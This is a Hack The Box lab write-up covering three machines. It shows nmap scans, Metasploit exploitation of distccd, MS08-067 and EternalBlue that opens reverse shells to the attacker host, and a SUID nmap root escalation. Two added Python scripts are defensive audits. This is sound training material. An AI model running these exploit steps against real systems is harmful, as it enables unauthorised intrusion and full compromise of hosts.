HTB Writeups - LAME, LEGACY, BLUE
A 3-for-1!
These three machines were too short or easy to really warrant a full writeup each, so I've combined them into this post. Let's get started!
LAME
The most obvious way to complete this box seems to be with an SMB exploit, but I initially went a different way that I’ll go through here.
We start with an exhaustive nmap scan of every TCP port to find what's open:

```
root@kali:~ # nmap -sV -p1-65535 10.10.10.3
Starting Nmap 7.70 ( https://nmap.org )
Nmap scan report for 10.10.10.3
Host is up (0.080s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3632/tcp open  distccd
```
And now another scan, concentrating on those open ports, to get detailed version information:

```
root@kali:~ # nmap -sV --version-light -p21,22,139,445,3632 10.10.10.3
Starting Nmap 7.70 ( https://nmap.org )
Nmap scan report for 10.10.10.3
Host is up (0.049s latency).
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```
distccd is a service that allows compilation jobs to be distributed over several machines, but versions before 2.16 have a remote code execution vulnerability. There's a metasploit module we can use to take advantage of this. We'll start msfconsole:

```
msf5 > use exploit/unix/misc/distcc_exec
msf5 exploit(unix/misc/distcc_exec) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf5 exploit(unix/misc/distcc_exec) > set RPORT 3632
RPORT => 3632
msf5 exploit(unix/misc/distcc_exec) > exploit

[*] Started reverse TCP double handler on 10.10.14.51:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo o9TguQKChBhEyHVo;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "o9TguQKChBhEyHVo\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.51:4444 -> 10.10.10.3:58496)
```
Now that we have a basic shell on the remote machine, we can gather some information and grab the user flag.

```
$ whoami & hostname & pwd
daemon
lame
/tmp
$ cd /home/ && ls
ftp  makis  service  user
$ ls makis
user.txt
$ cat makis/user.txt
```
We don’t yet have access to /root/, however, so we need to escalate our privileges.
Let's check which programs have the SUID bit set, meaning they run with the privileges of their owner rather than ours, with the following command:

```
find / -perm -u=s -type f 2>/dev/null
```

`/` says to search everything from the root directory down, `-perm -u=s` restricts the matches to files with the SUID bit set, `-type f` matches only regular files, and `2>/dev/null` sends all error output (such as permission-denied messages for directories we can't read) to /dev/null, discarding it. Here's the output:

```
/bin/umount
/bin/fusermount
/bin/su
/bin/mount
/bin/ping
/bin/ping6
/sbin/mount.nfs
/lib/dhcp3-client/call-dhclient-script
/usr/bin/sudoedit
/usr/bin/X
/usr/bin/netkit-rsh
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/sudo
/usr/bin/netkit-rlogin
/usr/bin/arping
/usr/bin/at
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/nmap
/usr/bin/chsh
/usr/bin/netkit-rcp
/usr/bin/passwd
/usr/bin/mtr
/usr/sbin/uuidd
/usr/sbin/pppd
/usr/lib/telnetlogin
/usr/lib/apache2/suexec
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown
```
Most of the programs here are standard system binaries that are SUID by design, and thus unlikely to be easy targets, but nmap isn't.
Who is the owner, and are we able to execute it?

```
$ ls -l /usr/bin/nmap
-rwsr-xr-x 1 root root 780676 Apr  8  2008 /usr/bin/nmap
```
What version is it?

```
$ nmap --version
Nmap version 4.53 ( http://insecure.org )
```
As it turns out, old versions of nmap had an interactive mode that let users execute shell commands. Because the binary is SUID, we can use this mode to spawn a shell with the privileges of the program's owner, in this case root.

```
$ nmap --interactive
Starting Nmap V. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
$ whoami
root
$ cat /root/root.txt
```
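The root shell above comes from a binary that had no business being SUID root. As an added example (not code from the original post), here is the `find / -perm -u=s -type f 2>/dev/null` check from earlier written in Python and turned into an audit: it walks a tree, collects regular files with the set-user-ID bit, and compares them against an allowlist so that an unexpected SUID program such as nmap is reported. The allowlist, the demo directory tree and the `build_demo_root` helper are constructed for illustration; on a real host you would audit `/` and derive the baseline from the distribution's package metadata.

```python
"""Audit SUID binaries under a root directory against an expected list.

Added example for this writeup, not part of the original post. The
allowlist and the demo tree are constructed for illustration only.
"""
import os
import stat
import tempfile

# Constructed allowlist: SUID programs a typical Linux host needs, as paths
# relative to the filesystem root being audited. Not a vetted baseline.
EXPECTED_SUID = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping",
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp",
}


def is_suid_regular(mode):
    """True for a regular file with the set-user-ID bit (find's -type f -perm -u=s)."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def collect_suid(root):
    """Walk `root` and return sorted (path, owner uid) pairs for SUID regular files.

    Entries that cannot be stat'ed are skipped, which is what 2>/dev/null
    hides in the shell version. Symlinks are not followed (os.walk default)
    and lstat is used, so a link to a SUID file is not counted twice.
    """
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if is_suid_regular(st.st_mode):
                found.append((path, st.st_uid))
    return sorted(found)


def audit_suid(root, expected=EXPECTED_SUID):
    """Classify SUID files under `root` as expected or unexpected.

    Paths are reported relative to `root` with a leading slash, so a staged
    tree (the demo below) is compared against the same allowlist as a live
    system audited with root="/".
    """
    report = {"expected": [], "unexpected": [], "owners": {}}
    for path, uid in collect_suid(root):
        rel = "/" + os.path.relpath(path, root)
        bucket = "expected" if rel in expected else "unexpected"
        report[bucket].append(rel)
        report["owners"][rel] = uid
    return report


def build_demo_root():
    """Create a constructed tree: one expected SUID file, one unexpected, one plain."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    layout = {
        "bin/su": 0o4755,        # expected SUID program
        "usr/bin/nmap": 0o4755,  # unexpected SUID program, the finding from the writeup
        "usr/bin/ls": 0o755,     # ordinary executable, must not be reported
    }
    for rel, mode in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    result = audit_suid(build_demo_root())
    for rel in result["unexpected"]:
        print(f"UNEXPECTED SUID: {rel} (owner uid {result['owners'][rel]})")
    for rel in result["expected"]:
        print(f"expected SUID:   {rel}")
```

Running the script prints `/usr/bin/nmap` as the one unexpected entry in the demo tree. On a host like LAME the remediation is simply `chmod u-s /usr/bin/nmap` (nmap does not need to be SUID for ordinary use), and scheduling the audit gives you a change alert the next time a package or an admin sets the bit on something new.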
LEGACY
As usual, we start with an nmap scan:

```
root@kali:~ # nmap -sV 10.10.10.4
Starting Nmap 7.70 ( https://nmap.org )
Nmap scan report for 10.10.10.4
Host is up (0.087s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Microsoft Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
```
It's fairly clear that we're going to be exploiting SMB. We can use a metasploit module to get detailed information about the host:

```
msf5 > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > set RHOSTS 10.10.10.4
RHOSTS => 10.10.10.4
msf5 auxiliary(scanner/smb/smb_version) > run

[+] 10.10.10.4:445 - Host is running Windows XP SP3 (language:English) (name:LEGACY) (workgroup:HTB )
[*] 10.10.10.4:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
Now that we know the machine is running XP SP3, we can narrow down the list of suitable exploits to use against the service:

```
msf5 auxiliary(scanner/smb/smb_version) > search path:exploit/windows/smb sp3
```
Having chosen one, configure the parameters and execute:

```
msf5 auxiliary(scanner/smb/smb_version) > use exploit/windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.10.10.4
RHOSTS => 10.10.10.4
msf5 exploit(windows/smb/ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 10.10.14.51:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (179779 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.51:4444 -> 10.10.10.4:1032) at 2019-09-01 11:13:54 -0400

meterpreter >
```
We have a meterpreter shell!

```
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > pwd
C:\WINDOWS\system32
```

The exploit spawned our shell with SYSTEM privileges, so we're done here.

```
meterpreter > cat /Documents\ and\ Settings/Administrator/Desktop/root.txt
meterpreter > cat /Documents\ and\ Settings/john/Desktop/user.txt
```
BLUE
You know the drill, nmap time:

```
root@kali:~ # nmap -sV 10.10.10.40
Starting Nmap 7.70 ( https://nmap.org )
Nmap scan report for 10.10.10.40
Host is up (0.20s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
```
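Both the LEGACY and the BLUE scans tell the same story before any exploit is run: SMB is reachable from the scanning host, and the service banner names the operating system. As an added example (not code from the original post), the script below parses the port table that nmap prints in its normal output, the format shown in those two scans, and turns it into the findings a defender would want from the same data: which ports expose SMB, and whether the OS fingerprint is one that no longer receives patches. The two sample scans are embedded as constructed text modelled on the output above, and the `UNSUPPORTED_OS_MARKERS` table is a deliberately small illustration rather than a complete end-of-life list.

```python
"""Parse nmap -sV normal output and flag SMB exposure on legacy Windows.

Added example for this writeup, not part of the original post. The sample
scan text and the marker table are constructed for illustration.
"""
import re

# One row of nmap's port table: "445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds".
# STATE is matched loosely because nmap also prints values like "open|filtered".
PORT_ROW = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

# Constructed, intentionally short list of OS names that are out of support.
UNSUPPORTED_OS_MARKERS = ("Windows XP", "Windows 2000", "Windows Server 2003")

# SMB is served on 445 directly and on 139 via NetBIOS session service.
SMB_PORTS = (139, 445)

# Constructed sample modelled on the LEGACY scan in the writeup.
LEGACY_SCAN = """\
Nmap scan report for 10.10.10.4
Host is up (0.087s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Microsoft Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
"""

# Constructed sample modelled on the BLUE scan in the writeup (trimmed).
BLUE_SCAN = """\
Nmap scan report for 10.10.10.40
Not shown: 991 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
"""


def parse_nmap(text):
    """Return one dict per port-table row; header, banner and summary lines are ignored."""
    rows = []
    for line in text.splitlines():
        m = PORT_ROW.match(line.strip())
        if not m:
            continue
        port, proto, state, service, version = m.groups()
        rows.append({
            "port": int(port),
            "proto": proto,
            "state": state,
            "service": service,
            "version": (version or "").strip(),
        })
    return rows


def smb_findings(rows):
    """Derive review findings from parsed rows.

    Only open ports count: a closed 3389 in the LEGACY scan is not a finding.
    Each finding carries a short issue code plus the ports it applies to.
    """
    open_rows = [r for r in rows if r["state"] == "open"]
    findings = []

    smb = [f"{r['port']}/{r['proto']}" for r in open_rows if r["port"] in SMB_PORTS]
    if smb:
        findings.append({
            "issue": "smb-exposed",
            "ports": smb,
            "note": "SMB reachable from the scanning network; confirm SMBv1 is disabled "
                    "and MS17-010 / MS08-067 patch state, or restrict 139/445 at the host firewall",
        })

    for r in open_rows:
        marker = next((m for m in UNSUPPORTED_OS_MARKERS if m in r["version"]), None)
        if marker:
            findings.append({
                "issue": "unsupported-os",
                "ports": [f"{r['port']}/{r['proto']}"],
                "note": f"banner identifies {marker}, which no longer receives security updates",
            })
    return findings


if __name__ == "__main__":
    for name, text in (("LEGACY", LEGACY_SCAN), ("BLUE", BLUE_SCAN)):
        print(f"== {name} ==")
        for f in smb_findings(parse_nmap(text)):
            print(f"[{f['issue']}] {', '.join(f['ports'])}: {f['note']}")
```

For LEGACY the output is two findings (SMB on 139 and 445, and an unsupported Windows XP banner on 445); for BLUE it is only the SMB exposure, because the "Windows 7 - 10" range is not in the constructed marker table. The point of keeping the rules explicit is that they are easy to extend with your own asset inventory, and that the parser stays independent of them.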
And… it’s another SMB exploit.
This time, we know the box is running at least Windows 7, so the previous exploit won't do. However, this box is vulnerable to the infamous EternalBlue exploit, used in the WannaCry ransomware attack. There are a few metasploit modules for this, so let's start up msfconsole and get this writeup over with :)

```
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40
RHOSTS => 10.10.10.40
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 10.10.14.51:4444
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 17 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (10.10.14.51:4444 -> 10.10.10.40:49159) at 2019-09-01 11:57:44 -0400
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

C:\Windows\system32> whoami
nt authority\system
```
Finally, let's get the user and root flags.

```
C:\Windows\System32> more \Users\Administrator\Desktop\root.txt
C:\Windows\System32> more \Users\haris\Desktop\user.txt
```
That’s all three rooted! Thanks for reading, some more interesting ones coming soon…
- j4ckdaw